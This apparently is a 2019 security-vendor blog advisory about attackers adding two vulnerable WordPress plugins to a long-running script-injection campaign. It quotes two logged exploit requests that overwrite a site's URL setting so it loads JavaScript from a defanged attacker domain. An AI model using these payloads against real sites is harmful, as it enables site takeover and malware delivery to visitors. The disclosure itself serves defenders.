• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login
Core Integrity Checksum for WordPress

Plugins Added to Malicious Campaign

April 25, 2019John Castro

FacebookTwitterSubscribe

We continue to see an increase in the number of plugins attacked as part of a campaign that’s been active for quite a long time. Bad actors have added more vulnerable plugins to inject similar malicious scripts.

Plugins Added to the Attack

  • Download WP Inventory Manager (version <= 1.8.2)
  • Woocommerce User Email Verification.  (version <= 3.3.0  **Still Not Fixed**)

Attackers are trying to exploit vulnerable versions of these plugins. Public exploits already exist for all of the components listed above, and we highly encourage you to keep your software up to date to prevent any infection.

Payloads Used by Bots

  • Download WP Inventory Manager  
51.15.147.147 - action=save&siteurl=hxxps%3A%2F%2Fcdn.deliverymoretimes[.]info%2Fcdn.js%3Fty%3D1%26 [25/Apr/2019:05:14:28 +0000] "POST /wp-admin/admin-post.php?page=wpim_manage_settings HTTP/1.1" 200 5 "-" "-"
  • Woocommerce User Email Verification
51.15.147.147 - wuev_form_type=siteurl&hxxps://cdn.deliverymoretimes[.]info/simpletype.js?ty=1& [25/Apr/2019:05:14:28 +0000] "POST /wp-admin/admin-post.php HTTP/1.1" 200 5 "-" "-"

Malicious Domains Injected So far

hxxps://cdn[.]deliverymoretimes[.]info/simpletype[.]js?ty=1

As always, we recommend adding a WAF as a second layer of protection. If you are using the plugin Woocommerce User Email Verification, it should be removed since the developer hasn’t fixed the “arbitrary options update”.

FacebookTwitterSubscribe

Categories: WordPress SecurityTags: Balada Injector, WordPress Plugins and Themes

About John Castro

John Castro is Sucuri's Vulnerability Researcher who joined the company in 2015. His main responsibilities include threat intelligence and vulnerability analysis. John's professional experience covers more than a decade of pentesting, vulnerability research and malware analysis. When John isn't working with WordPres plugin vulnerabilities, you might find him hiking or hunting for new restaurants. Connect with him on LinkedIn

Reader Interactions

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.